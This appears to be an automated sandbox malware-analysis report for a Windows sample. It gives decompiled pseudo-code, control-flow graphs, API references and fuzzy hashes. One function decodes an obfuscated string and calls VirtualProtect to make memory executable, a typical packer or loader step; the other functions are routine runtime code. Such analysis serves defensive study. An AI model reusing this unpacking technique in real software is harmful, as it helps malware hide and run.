                                                                                                                                                                                                        • Opcode ID: d3fc454bc8ee17c82199813fd9e8744f877acaaa542245503a28e8f46450a717
                                                                                                                                                                                                        • Instruction ID: 8e599436bb53761a45d7e8bfd19a6c9808a564786bfde09938c04333ba0431d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3fc454bc8ee17c82199813fd9e8744f877acaaa542245503a28e8f46450a717
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF11774E043A8AACB04C7B9EC86BFDBEB15F96314F14025AF851A73C2C6FC4585875A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 113 418c60-418cba 115 418cc0-418de3 113->115 116 418de8-418eb0 GetModuleHandleA GetProcAddress VirtualProtect 113->116
                                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                                        			E00418C60(void* _a4, long _a8) {
                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                        				CHAR* _v12;
                                                                                                                                                                                                        				struct HINSTANCE__* _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				char _v21;
                                                                                                                                                                                                        				char _v22;
                                                                                                                                                                                                        				char _v23;
                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                        				char _v25;
                                                                                                                                                                                                        				char _v26;
                                                                                                                                                                                                        				char _v27;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				char _v29;
                                                                                                                                                                                                        				char _v30;
                                                                                                                                                                                                        				char _v31;
                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                                        				signed int _v37;
                                                                                                                                                                                                        				void* _t222;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = "VirtualProtect";
                                                                                                                                                                                                        				_v32 = 0x80;
                                                                                                                                                                                                        				_v31 = 0xa4;
                                                                                                                                                                                                        				_v30 = 0xe0;
                                                                                                                                                                                                        				_v29 = 0x41;
                                                                                                                                                                                                        				_v28 = 3;
                                                                                                                                                                                                        				_v27 = 0xc3;
                                                                                                                                                                                                        				_v26 = 0x51;
                                                                                                                                                                                                        				_v25 = 4;
                                                                                                                                                                                                        				_v24 = 0xf0;
                                                                                                                                                                                                        				_v23 = 0xd3;
                                                                                                                                                                                                        				_v22 = 0x51;
                                                                                                                                                                                                        				_v21 = 0xd0;
                                                                                                                                                                                                        				_v20 = 0xd;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				while(_v36 < 0xd) {
                                                                                                                                                                                                        					_v37 =  *((intOrPtr*)(_t222 + _v36 - 0x1c));
                                                                                                                                                                                                        					_v37 =  ~(_v37 & 0x000000ff);
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) - 0x4d;
                                                                                                                                                                                                        					_v37 = _v37 & 0x000000ff ^ 0x00000050;
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) - 0x4e;
                                                                                                                                                                                                        					_v37 =  ~(_v37 & 0x000000ff);
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) - 0xe5;
                                                                                                                                                                                                        					_v37 =  ~(_v37 & 0x000000ff);
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) - _v36;
                                                                                                                                                                                                        					_v37 = _v37 & 0x000000ff ^ _v36;
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) - 0xc4;
                                                                                                                                                                                                        					_v37 = _v37 & 0x000000ff ^ 0x0000006d;
                                                                                                                                                                                                        					_v37 =  ~(_v37 & 0x000000ff);
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) >> 0x00000006 | (_v37 & 0x000000ff) << 0x00000002;
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) + _v36;
                                                                                                                                                                                                        					_v37 =  !(_v37 & 0x000000ff);
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) + 0xab;
                                                                                                                                                                                                        					_v37 =  ~(_v37 & 0x000000ff);
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) + 0x92;
                                                                                                                                                                                                        					_v37 = _v37 & 0x000000ff ^ 0x000000f8;
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) + _v36;
                                                                                                                                                                                                        					_v37 =  ~(_v37 & 0x000000ff);
                                                                                                                                                                                                        					_v37 = _v37 & 0x000000ff ^ 0x000000cd;
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) + 0x90;
                                                                                                                                                                                                        					_v37 = _v37 & 0x000000ff ^ 0x0000002b;
                                                                                                                                                                                                        					_v37 = (_v37 & 0x000000ff) - 1;
                                                                                                                                                                                                        					 *((char*)(_t222 + _v36 - 0x1c)) = _v37;
                                                                                                                                                                                                        					_v36 = _v36 + 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("rcr edi, 0x5f");
                                                                                                                                                                                                        				asm("ror eax, 0xc8");
                                                                                                                                                                                                        				asm("bswap esi");
                                                                                                                                                                                                        				asm("ror esi, 0x6f");
                                                                                                                                                                                                        				asm("rcl edx, 0xc0");
                                                                                                                                                                                                        				asm("rol ebx, 0x9f");
                                                                                                                                                                                                        				asm("ror edi, 0xbe");
                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                        				asm("rol ebx, 0x4b");
                                                                                                                                                                                                        				asm("ror edx, 0xd0");
                                                                                                                                                                                                        				asm("rol edx, 0x6e");
                                                                                                                                                                                                        				asm("rol edx, 0x80");
                                                                                                                                                                                                        				asm("rcr edx, 0xdf");
                                                                                                                                                                                                        				asm("bswap edi");
                                                                                                                                                                                                        				asm("rcl edi, 0x6f");
                                                                                                                                                                                                        				asm("rcr edi, 0xf3");
                                                                                                                                                                                                        				_v16 = GetModuleHandleA( &_v32);
                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                        				 *0x42a3a0 = GetProcAddress(_v16, _v12);
                                                                                                                                                                                                        				VirtualProtect(_a4, _a8, 0x40,  &_v8); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00418d40
                                                                                                                                                                                                        0x00418d53
                                                                                                                                                                                                        0x00418d5d
                                                                                                                                                                                                        0x00418d66
                                                                                                                                                                                                        0x00418d73
                                                                                                                                                                                                        0x00418d7c
                                                                                                                                                                                                        0x00418d88
                                                                                                                                                                                                        0x00418d95
                                                                                                                                                                                                        0x00418d9f
                                                                                                                                                                                                        0x00418da8
                                                                                                                                                                                                        0x00418db5
                                                                                                                                                                                                        0x00418dc2
                                                                                                                                                                                                        0x00418dcc
                                                                                                                                                                                                        0x00418dd6
                                                                                                                                                                                                        0x00418ddf
                                                                                                                                                                                                        0x00418cb3
                                                                                                                                                                                                        0x00418cb3
                                                                                                                                                                                                        0x00418dea
                                                                                                                                                                                                        0x00418def
                                                                                                                                                                                                        0x00418df7
                                                                                                                                                                                                        0x00418e03
                                                                                                                                                                                                        0x00418e0f
                                                                                                                                                                                                        0x00418e13
                                                                                                                                                                                                        0x00418e1f
                                                                                                                                                                                                        0x00418e22
                                                                                                                                                                                                        0x00418e2b
                                                                                                                                                                                                        0x00418e39
                                                                                                                                                                                                        0x00418e3c
                                                                                                                                                                                                        0x00418e3f
                                                                                                                                                                                                        0x00418e4d
                                                                                                                                                                                                        0x00418e50
                                                                                                                                                                                                        0x00418e52
                                                                                                                                                                                                        0x00418e5e
                                                                                                                                                                                                        0x00418e75
                                                                                                                                                                                                        0x00418e78
                                                                                                                                                                                                        0x00418e8d
                                                                                                                                                                                                        0x00418ea0
                                                                                                                                                                                                        0x00418eb0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000080), ref: 00418E6F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,004216F4), ref: 00418E87
                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(004216F4,?,00000040,00000000), ref: 00418EA0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                        • String ID: A$Q$Q
                                                                                                                                                                                                        • API String ID: 2099061454-203127502
                                                                                                                                                                                                        • Opcode ID: eab7c007813ff493d7400f2e6126ef1e6c2968ac6ad85a097b0f3b5df062cfa8
                                                                                                                                                                                                        • Instruction ID: a1869b02d53cdf2f81a375c8e2eaf3b1254d8c9906bea9798985b8b9fd0d62db
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eab7c007813ff493d7400f2e6126ef1e6c2968ac6ad85a097b0f3b5df062cfa8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2714E5580D2DD89DF06C7F988542EDBFB15F6F211F08428AE4E2B62C6C2284A4E9B75
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 117 40344c-403460 call 406d52 120 403462 117->120 121 40346c-403475 117->121 122 403464-403469 call 406d9c 120->122 123 403494-403499 121->123 124 403477-403480 121->124 126 4034a0-4034a3 123->126 127 40349b-40349e 123->127 124->123 125 403482-40348e 124->125 129 403490-403492 125->129 130 4034b4-4034f9 call 40326d call 40306f call 4028a7 call 40306f call 4028a7 126->130 131 4034a5-4034a7 call 402e77 126->131 127->122 129->122 146 4035a6-4035c2 130->146 135 4034ac-4034b0 131->135 135->127 137 4034b2 135->137 137->129 148 4035c8 146->148 149 4034fe-403501 146->149 150 4035e0 148->150 151 403507-40351f call 40306f call 4028a7 149->151 152 4035ca-4035cd 149->152 155 4035e3-4035ef call 4011c0 150->155 164 403521-403545 call 40306f call 4028a7 call 407564 151->164 165 40354b-403555 151->165 152->150 153 4035cf-4035de call 402e77 152->153 153->150 162 4035f6-4035f9 153->162 155->162 162->155 164->150 164->165 165->162 166 40355b-40355d 165->166 168 403571-4035a4 call 40306f call 4028a7 call 40306f call 4028a7 166->168 169 40355f-403563 166->169 168->146 169->150 171 403565-40356c call 402330 169->171 171->168
                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E0040344C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                                                        				intOrPtr* _t63;
                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				intOrPtr* _t80;
                                                                                                                                                                                                        				char* _t81;
                                                                                                                                                                                                        				char _t84;
                                                                                                                                                                                                        				intOrPtr* _t87;
                                                                                                                                                                                                        				intOrPtr* _t118;
                                                                                                                                                                                                        				intOrPtr* _t123;
                                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(0x54);
                                                                                                                                                                                                        				E00406D52(E00417262, __ebx, __edi, __esi);
                                                                                                                                                                                                        				_t84 =  *((intOrPtr*)(_t124 + 8));
                                                                                                                                                                                                        				_t123 = __ecx;
                                                                                                                                                                                                        				if(_t84 != 0xffffffff) {
                                                                                                                                                                                                        					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
                                                                                                                                                                                                        					_t118 = 0;
                                                                                                                                                                                                        					__eflags = _t87;
                                                                                                                                                                                                        					if(_t87 == 0) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
                                                                                                                                                                                                        						__eflags = _t50 - _t118;
                                                                                                                                                                                                        						if(_t50 != _t118) {
                                                                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								 *((char*)(_t124 - 0x30)) = _t84;
                                                                                                                                                                                                        								E0040326D(_t84, _t124 - 0x2c, 8, _t118);
                                                                                                                                                                                                        								 *((intOrPtr*)(_t124 - 4)) = _t118;
                                                                                                                                                                                                        								_t54 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x48));
                                                                                                                                                                                                        								_t57 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x50));
                                                                                                                                                                                                        								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
                                                                                                                                                                                                        								_push(_t124 - 0x38);
                                                                                                                                                                                                        								_t84 = _t123 + 0x44;
                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                        									_t112 = _t124 - 0x30;
                                                                                                                                                                                                        									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
                                                                                                                                                                                                        									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
                                                                                                                                                                                                        									__eflags = _t59;
                                                                                                                                                                                                        									if(_t59 < 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags = _t59 - 1;
                                                                                                                                                                                                        									if(_t59 > 1) {
                                                                                                                                                                                                        										__eflags = _t59 - 3;
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L25;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t63 = E00402E77(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
                                                                                                                                                                                                        											__eflags = _t63;
                                                                                                                                                                                                        											if(_t63 != 0) {
                                                                                                                                                                                                        												goto L27;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L25;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x58));
                                                                                                                                                                                                        										__eflags = _t118;
                                                                                                                                                                                                        										if(_t118 == 0) {
                                                                                                                                                                                                        											L16:
                                                                                                                                                                                                        											 *((char*)(_t123 + 0x41)) = 1;
                                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
                                                                                                                                                                                                        											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
                                                                                                                                                                                                        												L27:
                                                                                                                                                                                                        												_t123 =  *((intOrPtr*)(_t124 + 8));
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t118;
                                                                                                                                                                                                        												if(_t118 > 0) {
                                                                                                                                                                                                        													L20:
                                                                                                                                                                                                        													 *((intOrPtr*)(_t124 - 0x40)) = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x48));
                                                                                                                                                                                                        													_t57 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x50));
                                                                                                                                                                                                        													_push(_t124 - 0x38);
                                                                                                                                                                                                        													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
                                                                                                                                                                                                        													__eflags = _t118;
                                                                                                                                                                                                        													continue;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
                                                                                                                                                                                                        													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
                                                                                                                                                                                                        														goto L25;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														E00402330(_t84, _t124 - 0x2c, _t118, _t123, 8, 0);
                                                                                                                                                                                                        														goto L20;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t76 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x60));
                                                                                                                                                                                                        											_push( *((intOrPtr*)(_t123 + 0x4c)));
                                                                                                                                                                                                        											_push(_t118);
                                                                                                                                                                                                        											_push(1);
                                                                                                                                                                                                        											_push(_t76);
                                                                                                                                                                                                        											_t77 = E00407564(_t84, _t112, _t118, _t123, __eflags);
                                                                                                                                                                                                        											_t125 = _t125 + 0x10;
                                                                                                                                                                                                        											__eflags = _t118 - _t77;
                                                                                                                                                                                                        											if(_t118 != _t77) {
                                                                                                                                                                                                        												L25:
                                                                                                                                                                                                        												__eflags = _t123;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L16;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									E004011C0(_t124 - 0x2c, 1, 0);
                                                                                                                                                                                                        									goto L2;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t50 = E00402E77(__eflags, _t84, _t50); // executed
                                                                                                                                                                                                        								__eflags = _t50;
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							L8:
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t80 =  *((intOrPtr*)(__ecx + 0x34));
                                                                                                                                                                                                        						__eflags = _t87 -  *_t80 + _t87;
                                                                                                                                                                                                        						if(_t87 >=  *_t80 + _t87) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *_t80 =  *_t80 - 1;
                                                                                                                                                                                                        							__eflags =  *_t80;
                                                                                                                                                                                                        							_t123 =  *((intOrPtr*)(__ecx + 0x24));
                                                                                                                                                                                                        							_t81 =  *_t123;
                                                                                                                                                                                                        							 *_t123 = _t81 + 1;
                                                                                                                                                                                                        							 *_t81 = _t84;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L2:
                                                                                                                                                                                                        				return E00406D9C(_t84, _t118, _t123);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x0040356c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040356c
                                                                                                                                                                                                        0x00403563
                                                                                                                                                                                                        0x0040355d
                                                                                                                                                                                                        0x00403521
                                                                                                                                                                                                        0x0040352f
                                                                                                                                                                                                        0x00403534
                                                                                                                                                                                                        0x00403537
                                                                                                                                                                                                        0x00403538
                                                                                                                                                                                                        0x0040353a
                                                                                                                                                                                                        0x0040353b
                                                                                                                                                                                                        0x00403540
                                                                                                                                                                                                        0x00403543
                                                                                                                                                                                                        0x00403545
                                                                                                                                                                                                        0x004035e0
                                                                                                                                                                                                        0x004035e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403545
                                                                                                                                                                                                        0x0040351f
                                                                                                                                                                                                        0x004035ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004035ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004034a5
                                                                                                                                                                                                        0x004034a7
                                                                                                                                                                                                        0x004034ae
                                                                                                                                                                                                        0x004034b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004034b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004034b2
                                                                                                                                                                                                        0x004034b0
                                                                                                                                                                                                        0x0040349b
                                                                                                                                                                                                        0x0040349b
                                                                                                                                                                                                        0x0040349b
                                                                                                                                                                                                        0x00403477
                                                                                                                                                                                                        0x00403477
                                                                                                                                                                                                        0x0040347e
                                                                                                                                                                                                        0x00403480
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403482
                                                                                                                                                                                                        0x00403482
                                                                                                                                                                                                        0x00403482
                                                                                                                                                                                                        0x00403484
                                                                                                                                                                                                        0x00403487
                                                                                                                                                                                                        0x0040348c
                                                                                                                                                                                                        0x0040348e
                                                                                                                                                                                                        0x00403490
                                                                                                                                                                                                        0x00403490
                                                                                                                                                                                                        0x00403480
                                                                                                                                                                                                        0x00403462
                                                                                                                                                                                                        0x00403462
                                                                                                                                                                                                        0x00403464
                                                                                                                                                                                                        0x00403469

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Fputc$H_prolog3_
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2569218679-3916222277
                                                                                                                                                                                                        • Opcode ID: 58eb260c760e7b2d96b30122c386c9c05e1722a93f8294f44c7b8a28c931b633
                                                                                                                                                                                                        • Instruction ID: 4726f201d7542bd95522cf20840ec9224a10e0e665caa417b9dee719faa50442
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58eb260c760e7b2d96b30122c386c9c05e1722a93f8294f44c7b8a28c931b633
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF519532900204ABCF15EFB5CC819DEBBB9AF44705F14453FE112B72D5EA79AA44CB58
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 185 4067cd-4067d5 186 4067e4-4067ef call 40bc7f 185->186 189 4067f1-4067f2 186->189 190 4067d7-4067e2 call 40bd58 186->190 190->186 193 4067f3-4067ff 190->193 194 406801-406819 call 4067b2 call 4079c2 193->194 195 40681a-406831 call 402200 call 404efb 193->195 194->195
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E004067CD(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                        				char _v0;
                                                                                                                                                                                                        				intOrPtr _v4;
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __edi;
                                                                                                                                                                                                        				_t26 = __edx;
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t11 = E0040BC7F(_t20, _t26, _t27, _a4); // executed
                                                                                                                                                                                                        					if(_t11 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t12 = E0040BD58(_a4);
                                                                                                                                                                                                        					__eflags = _t12;
                                                                                                                                                                                                        					if(_t12 == 0) {
                                                                                                                                                                                                        						__eflags =  *0x42a760 & 0x00000001;
                                                                                                                                                                                                        						_t28 = L"cription";
                                                                                                                                                                                                        						if(( *0x42a760 & 0x00000001) == 0) {
                                                                                                                                                                                                        							 *0x42a760 =  *0x42a760 | 0x00000001;
                                                                                                                                                                                                        							__eflags =  *0x42a760;
                                                                                                                                                                                                        							E004067B2(L"cription");
                                                                                                                                                                                                        							E004079C2( *0x42a760, 0x4175ab);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00402200( &_v16, _t28);
                                                                                                                                                                                                        						E00404EFB( &_v16, 0x424938);
                                                                                                                                                                                                        						asm("int3");
                                                                                                                                                                                                        						return E0040BFB0(_t26, _t27, _t28, _v12, _v8, _v4, 0,  &_v0);
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t11;
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 004067E7
                                                                                                                                                                                                          • Part of subcall function 0040BC7F: __FF_MSGBANNER.LIBCMT ref: 0040BCA2
                                                                                                                                                                                                          • Part of subcall function 0040BC7F: __NMSG_WRITE.LIBCMT ref: 0040BCA9
                                                                                                                                                                                                          • Part of subcall function 0040BC7F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A4A3,00000010,00000001,00000010,?,0040D618,00000018,00425108,0000000C,0040D6A9), ref: 0040BCF6
                                                                                                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040680A
                                                                                                                                                                                                          • Part of subcall function 004067B2: std::exception::exception.LIBCMT ref: 004067BE
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMTD ref: 0040681E
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040682C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1411284514-0
                                                                                                                                                                                                        • Opcode ID: 8585b3583b7bf29962c41642d1b4ddf261133dab2558048dd3e98995984e04be
                                                                                                                                                                                                        • Instruction ID: 0feaa45654ace7a4f6b28d2a44f09bc668b201aed8f0e173d8143faa04877f43
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8585b3583b7bf29962c41642d1b4ddf261133dab2558048dd3e98995984e04be
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF0277160021963DB147731EC46A593B68DF8071CB65803FFC02760E2DF7CDA66818E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 204 40c55f-40c570 call 40c534 ExitProcess
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040C55F(int _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E0040C534(_a4);
                                                                                                                                                                                                        				ExitProcess(_a4);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x0040c567
                                                                                                                                                                                                        0x0040c570

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040C567
                                                                                                                                                                                                          • Part of subcall function 0040C534: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040C56C,00000010,?,0040BCB8,000000FF,0000001E,?,0040A4A3,00000010,00000001,00000010,?,0040D618,00000018), ref: 0040C53E
                                                                                                                                                                                                          • Part of subcall function 0040C534: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040C54E
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040C570
